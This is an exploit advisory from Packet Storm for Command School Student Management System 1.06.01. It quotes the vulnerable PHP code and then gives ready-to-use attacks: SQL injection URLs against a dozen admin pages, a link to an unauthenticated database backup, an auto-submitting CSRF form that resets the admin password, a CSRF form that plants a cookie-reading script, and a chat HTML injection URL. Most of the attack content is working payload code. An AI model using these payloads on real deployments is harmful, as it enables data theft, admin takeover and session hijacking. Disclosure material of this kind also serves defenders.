the original cloud security

Command School Student Management System 1.06.01 SQL Injection / CSRF / XSS

Command School Student Management System 1.06.01 SQL Injection / CSRF / XSS
Posted Jan 7, 2014
Authored by AtT4CKxT3rR0r1ST

Command School Student Management System version 1.06.01 suffers from cross site request forgery, cross site scripting, and remote SQL injection vulnerabilities.

tags | exploit, remote, vulnerability, xss, sql injection, csrf
MD5 | 15237fb33e1f791d3b7e2af4164d04ba

Command School Student Management System 1.06.01 SQL Injection / CSRF / XSS

Change Mirror Download
Command School Student Management System V1.06.01  - Multiple Vulnerabilties
============================================================================

####################################################################
.:. Author : AtT4CKxT3rR0r1ST
.:. Contact : [F.Hack@w.cn] , [AtT4CKxT3rR0r1ST@gmail.com]
.:. Home : http://www.iphobos.com/blog/
.:. Script : http://sourceforge.net/projects/swifttide/
####################################################################

I. Multiple Sql Injection

##############
VULNERABILITY
##############
/admin_school_names.php
-----------------------------------------------------------------------------
line (27): $action=get_param("action");
line (54-56)
case "edit":
$school_names_id=get_param("id");
$sSQL="SELECT school_names_desc FROM school_names WHERE
school_names_id=$school_names_id";


note:[all Files same error]
-----------------------------------------------------------------------------

#########
EXPLOIT
#########

localhost/sw/admin_school_names.php?action=edit&id=null+and+1=2+union+select+version()
localhost/sw/admin_subjects.php?action=edit&id=null+and+1=2+union+select+version()
localhost/sw/admin_grades.php?action=edit&id=null+and+1=2+union+select+version()
localhost/sw/admin_terms.php?action=edit&id=null+and+1=2+union+select+version()
localhost/sw/admin_school_years.php?action=edit&id=null+and+1=2+union+select+version()
localhost/sw/admin_sgrades.php?action=edit&id=null+and+1=2+union+select+version()
localhost/sw/admin_media_codes_1.php?action=edit&id=null+and+1=2+union+select+version(),2,3
localhost/sw/admin_infraction_codes.php?action=edit&id=null+and+1=2+union+select+version()
localhost/sw/admin_generations.php?action=edit&id=null+and+1=2+union+select+version()
localhost/sw/admin_relations.php?action=edit&id=null+and+1=2+union+select+version()
localhost/sw/admin_titles.php?action=edit&id=null+and+1=2+union+select+version()
localhost/sw/health_allergies.php?action=edit&id=null+and+1=2+union+select+version()


II. Backup Download

##############
VULNERABILITY
##############

/Backup/backup_ray2.php (LINE: 78-126)

-----------------------------------------------------------------------------
// SET THE NAME OF THE BACKUP WITH A TIMESTAMP
$bkup = 'mysql' . date('Ymd\THis') . $db_name . '.txt';
$fp = fopen($bkup, "w");


// GET THE LIST OF TABLES
$sql = "SHOW TABLES";
$res = mysql_query($sql);
if (!$res) die( mysql_error() );
if (mysql_num_rows($res) == 0) die( "NO TABLES IN $db_name" );
while ($s = mysql_fetch_array($res))
{
$tables[] = $s[0];
}


// ITERATE OVER THE LIST OF TABLES
foreach ($tables as $table)
{

// WRITE THE DROP TABLE STATEMENT
fwrite($fp,"DROP TABLE `$table`;\n");

// GET THE CREATE TABLE STATEMENT
$res = mysql_query("SHOW CREATE TABLE `$table`");
if (!$res) die( mysql_error() );
$cre = mysql_fetch_array($res);
$cre[1] .= ";";
$txt = str_replace("\n", "", $cre[1]); // FIT EACH QUERY ON ONE LINE
fwrite($fp, $txt . "\n");

// GET THE TABLE DATA
$data = mysql_query("SELECT * FROM `$table`");
$num = mysql_num_fields($data);
while ($row = mysql_fetch_array($data))
{

// MAKE INSERT STATEMENTS FOR ALL THE VALUES
$txt = "INSERT INTO `$table` VALUES(";
for ($i=0; $i < $num; $i++)
{
$txt .= "'".mysql_real_escape_string($row[$i])."', ";
}
$txt = substr($txt, 0, -2);
fwrite($fp, $txt . ");\n");
}
}
// ALL DONE
fclose($fp);
-----------------------------------------------------------------------------

#####################################################
EXPLOIT
#####################################################

<html>
<title>Iphobos Blog</title>
<label><a href="http://localhost/sw/backup/backup_ray2.php" class="button
white">Backup Download</a></label>
</html>



III. Cross Site Request Forgery

[Change Password Admin]

<html>
<body onload="document.form0.submit();">
<form method="POST" name="form0" action="
http://localhost/sw/admin_change_password.php">
<input type="hidden" name="password" value="123456" />
<input type="hidden" name="action" value="update" />
</form>
</body>
</html>


IV. Cross Site Scripting

[CSRF with XSS Exploit]

<html>
<body onload="document.form0.submit();">
<form method="POST" name="form0" action="http://localhost/sw/add_topic.php">
<input type="hidden" name="topic"
value="<script>alert(document.cookie);</script>" />
<input type="hidden" name="detail" value="Iphobos Blog" />
<input type="hidden" name="Submit" value="Submit" />
</form>
</body>
</html>

V. Html File Injection

##############
VULNERABILITY
##############
/chat/message.php (LINE: 4-12)
-----------------------------------------------------------------------------
$f = fopen('msg.html',"a+");
} else {
$f = fopen('msg.html',"w+");
}
$nick = isset($_GET['nick']) ? $_GET['nick'] : "Hidden";
$msg = isset($_GET['msg']) ? htmlspecialchars($_GET['msg']) : ".";
$line = "<p><span class=\"name\">$nick: </span><span
class=\"txt\">$msg</span></p>";
fwrite($f,$line."\r\n");
fclose($f);

-----------------------------------------------------------------------------

#########
EXPLOIT
#########

localhost/sw/chat/message.php?line=&nick=IPHOBOS&msg=BLOG

After Exploit Go To localhost/sw/chat/msg.html
you will find the injection information

####################################################################

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

July 2017

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    2 Files
  • 2
    Jul 2nd
    3 Files
  • 3
    Jul 3rd
    15 Files
  • 4
    Jul 4th
    4 Files
  • 5
    Jul 5th
    15 Files
  • 6
    Jul 6th
    15 Files
  • 7
    Jul 7th
    10 Files
  • 8
    Jul 8th
    2 Files
  • 9
    Jul 9th
    10 Files
  • 10
    Jul 10th
    15 Files
  • 11
    Jul 11th
    15 Files
  • 12
    Jul 12th
    19 Files
  • 13
    Jul 13th
    16 Files
  • 14
    Jul 14th
    15 Files
  • 15
    Jul 15th
    3 Files
  • 16
    Jul 16th
    2 Files
  • 17
    Jul 17th
    8 Files
  • 18
    Jul 18th
    11 Files
  • 19
    Jul 19th
    15 Files
  • 20
    Jul 20th
    15 Files
  • 21
    Jul 21st
    15 Files
  • 22
    Jul 22nd
    7 Files
  • 23
    Jul 23rd
    2 Files
  • 24
    Jul 24th
    19 Files
  • 25
    Jul 25th
    28 Files
  • 26
    Jul 26th
    2 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2016 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close